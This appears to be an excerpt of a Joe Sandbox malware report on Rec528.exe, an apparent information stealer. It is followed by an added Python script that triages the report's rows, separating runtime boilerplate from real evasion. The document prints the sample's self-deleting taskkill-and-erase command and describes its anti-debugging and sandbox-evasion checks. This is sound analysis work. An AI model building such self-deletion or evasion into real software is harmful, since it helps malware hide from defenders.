Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,LdrInitializeThunk,__Init_thread_footer,LdrInitializeThunk,LdrInitializeThunk,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00423DAD LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_00423DAD
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10007E39 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_10007E39
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: Rec528.exe, 00000002.00000003.430338328.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000002.443117659.0000000001749000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!`M
Source: Rec528.exe, 00000002.00000003.430338328.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000002.443117659.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_004132EB
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402C00
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk, 2_2_00402F20
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0042039F mov eax, dword ptr fs:[00000030h] 2_2_0042039F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] 2_2_004429E7
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h] 2_2_00417B2F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h] 2_2_10007A06
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h] 2_2_10005EB5
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F2B4 LdrInitializeThunk,___scrt_release_startup_lock,___scrt_is_nonwritable_in_current_image,___scrt_is_nonwritable_in_current_image,LdrInitializeThunk,___scrt_uninitialize_crt, 2_2_0040F2B4
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F709 SetUnhandledExceptionFilter, 2_2_0040F709
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_004132EB
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F575
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040EB52
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10005630
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_10002A85
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10002F80
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f Jump to behavior
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "Rec528.exe" /f & erase "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00459734 GetVersion,GetModuleHandleA,6C8D5550,6C8D5550,6C8D5550,AllocateAndInitializeSid,LocalFree, 1_2_00459734
Source: Rec528.exe, 00000002.00000002.443674788.000000000342F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: F.program managerBb
Source: Rec528.exe, 00000002.00000002.443674788.000000000342F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Rec528.exe, 00000002.00000002.443674788.000000000342F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: program manager
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: GetLocaleInfoA, 0_2_004051D8
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: GetLocaleInfoA, 0_2_00405224
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: GetLocaleInfoA, 1_2_004085FC
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: GetLocaleInfoA, 1_2_00408648
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, 2_2_00404D40
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_0042700C
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_004270A7
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,LdrInitializeThunk, 2_2_00427132
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_0041E27F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW,LdrInitializeThunk, 2_2_00427385
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_004274AB
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW, 2_2_004275B1
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetUserDefaultLCID,IsValidCodePage,LdrInitializeThunk,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427680
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW, 2_2_0041E7A1
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00426D1F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_00426FC1
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F773 cpuid 2_2_0040F773
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6C8D5CA0,SetNamedPipeHandleState,6CBC7180,CloseHandle,CloseHandle, 1_2_00455E7C
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00405CC0 GetVersionExA, 0_2_00405CC0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00453D18 GetUserNameA, 1_2_00453D18
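The rows above mix three things that an analyst has to separate by hand: runtime boilerplate (the IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter chain and the EnumSystemLocalesW/GetLocaleInfoW/IsValidCodePage chains are the shape of the MSVC runtime's own fail-fast handler and setlocale initialisation, not deliberate anti-debugging), candidates that need a look (the direct fs:[30h] PEB reads, OutputDebugStringA next to GetLastError), and behaviour that is actionable on its own (the cmd /c taskkill ... & erase ... self-deletion, and the GetForegroundWindow/GetWindowTextA Sleep loop in Rec528.exe together with the "Program Manager" strings in its memory, which is the usual check for an idle desktop with no window in focus). The script below is an added example, not part of this report or of Joe Sandbox: it parses rows in the report's format, filters the runtime shapes, correlates the window-title polling with the in-memory string, and tags the self-deletion when the erased path is the parent's own image. The CRT chain list, the technique names and the confidence labels are this example's own assumptions; the sample rows are copied from the report above.

```python
"""Triage Joe Sandbox behaviour rows: split compiler-runtime boilerplate from real evasion.
Added example, not part of the report; rule names, labels and CRT shapes are assumptions."""
import re
from dataclasses import dataclass

FID = r"\d+_\d+_[0-9A-Fa-f]+"  # Joe Sandbox function id, e.g. 2_2_004132EB
CODE_ROW = re.compile(r"^Source: (?P<src>.+?) Code function: (?:" + FID + r" )?(?P<body>.+?) " + FID + r"$")
PROC_ROW = re.compile(r"^Source: (?P<src>.+?) Process created: \S+ (?P<cmd>.+?)(?: Jump to behavior)?$")
STR_ROW = re.compile(r"^Source: (?P<src>.+?) Binary or memory string: (?P<text>.+)$")
NOISE = re.compile(r"^(LdrInitializeThunk|__Init_thread_footer|___scrt_\w+|[0-9A-Fa-f]{8})$")  # not Win32 calls
KILL = re.compile(r'taskkill\s+(?:/f\s+)?/im\s+"?([^"\s]+)', re.I)
ERASE = re.compile(r'\b(?:erase|del)\s+"?([^"&]+?)"?\s*(?:&|$)', re.I)

# Chains the MSVC runtime emits by itself (__scrt_fastfail, __raise_securityfailure): they contain
# IsDebuggerPresent / SetUnhandledExceptionFilter but are not deliberate anti-debugging.
CRT_SHAPES = {
    ("IsProcessorFeaturePresent", "IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"),
    ("IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"),
    ("SetUnhandledExceptionFilter", "UnhandledExceptionFilter", "GetCurrentProcess", "TerminateProcess"),
    ("SetUnhandledExceptionFilter",),
}
CRT_LOCALE = {"EnumSystemLocalesW", "GetLocaleInfoW", "IsValidCodePage", "GetACP",
              "GetUserDefaultLCID", "IsValidLocale", "_wcschr"}  # setlocale() initialisation

@dataclass(frozen=True)
class Finding:
    image: str       # binary the behaviour was observed in
    technique: str
    confidence: str  # "high" = actionable, "review" = needs an analyst, "boilerplate" = compiler runtime
    evidence: str

def classify_chain(apis):
    s = set(apis)
    if apis in CRT_SHAPES:
        return [("crt exception handler shape", "boilerplate")]
    if s and s <= CRT_LOCALE:
        return [("crt locale initialisation", "boilerplate")]
    hits = []
    if "IsDebuggerPresent" in s:
        hits.append(("anti-debug: IsDebuggerPresent outside CRT handler", "review"))
    if {"OutputDebugStringA", "GetLastError"} <= s:  # also the shape of a FormatMessage logging helper
        hits.append(("anti-debug: OutputDebugString/GetLastError", "review"))
    if {"GetForegroundWindow", "GetWindowTextA"} <= s:
        hits.append(("sandbox evasion: foreground window title check", "review"))
    if {"GetNativeSystemInfo", "VirtualAlloc", "VirtualFree"} <= s:
        hits.append(("in-memory loader: reserve/commit/free pattern", "review"))
    return hits

def image_of(src):  # "C:\...\Rec528.exe" or "Rec528.exe, 00000002....sdmp" -> "Rec528.exe"
    return src.split("\\")[-1].split(",")[0]

def triage(rows):
    findings, window_polls, pm_strings = [], set(), set()
    for line in rows:
        if m := CODE_ROW.match(line):
            img, body = image_of(m["src"]), m["body"].strip()
            if body.startswith("mov ") and "fs:[00000030h]" in body:  # TEB->PEB: BeingDebugged/NtGlobalFlag, or CRT use
                findings.append(Finding(img, "anti-debug candidate: direct PEB read fs:[30h]", "review", body))
                continue
            apis = tuple(a.strip() for a in body.split(",") if a.strip() and not NOISE.match(a.strip()))
            for tech, conf in classify_chain(apis):
                findings.append(Finding(img, tech, conf, ",".join(apis)))
                if tech.startswith("sandbox evasion"):
                    window_polls.add(img)
        elif m := PROC_ROW.match(line):
            img, cmd = image_of(m["src"]), m["cmd"]
            k, e = KILL.search(cmd), ERASE.search(cmd)
            if k and e and image_of(e[1]).lower() == k[1].lower() == img.lower():
                findings.append(Finding(img, "self-deletion: taskkill own image, then erase it via cmd", "high", cmd))
            elif k:
                findings.append(Finding(img, "process termination via taskkill", "review", cmd))
        elif m := STR_ROW.match(line):
            img, text = image_of(m["src"]), m["text"]
            if "program manager" in text.lower():
                pm_strings.add(img)
            if "hyper-v" in text.lower():  # may be the analysis host leaking into memory, not a check
                findings.append(Finding(img, "vm artifact string in memory", "review", text))
    for img in window_polls & pm_strings:  # title polling plus the bare desktop's title in memory
        findings.append(Finding(img, "sandbox evasion: foreground window compared with 'Program Manager'",
                                "high", "GetForegroundWindow/GetWindowTextA loop + in-memory string"))
    return findings

# Rows copied from the report above (constructed sample input for this example).
SAMPLE_ROWS = [
    r"Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0",
    r"Source: Rec528.exe, 00000002.00000003.430338328.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000002.443117659.0000000001749000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!`M",
    r"Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402C00",
    r"Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk, 2_2_00402F20",
    r"Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F",
    r"Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F575",
    r"Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10005630",
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f Jump to behavior',
    r'Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "Rec528.exe" /f & erase "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" & exit Jump to behavior',
    r"Source: Rec528.exe, 00000002.00000002.443674788.000000000342F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager",
    r"Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetUserDefaultLCID,IsValidCodePage,LdrInitializeThunk,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427680",
]

if __name__ == "__main__":
    for f in sorted(triage(SAMPLE_ROWS), key=lambda f: f.confidence):
        print(f"[{f.confidence:11}] {f.image}: {f.technique}")
```

Run as is, the script marks the two fail-fast chains and the locale chain as boilerplate, leaves the PEB read and the OutputDebugStringA helper as review items, and reports the self-deletion and the correlated window-title check as high. The correlation step is the point: either half alone (the polling loop, or the "Program Manager" string) is weak evidence, the two together in the same image are not.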

Stealing of Sensitive Information

Source: Yara match File source: 2.2.Rec528.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.443567321.0000000003260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442855707.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY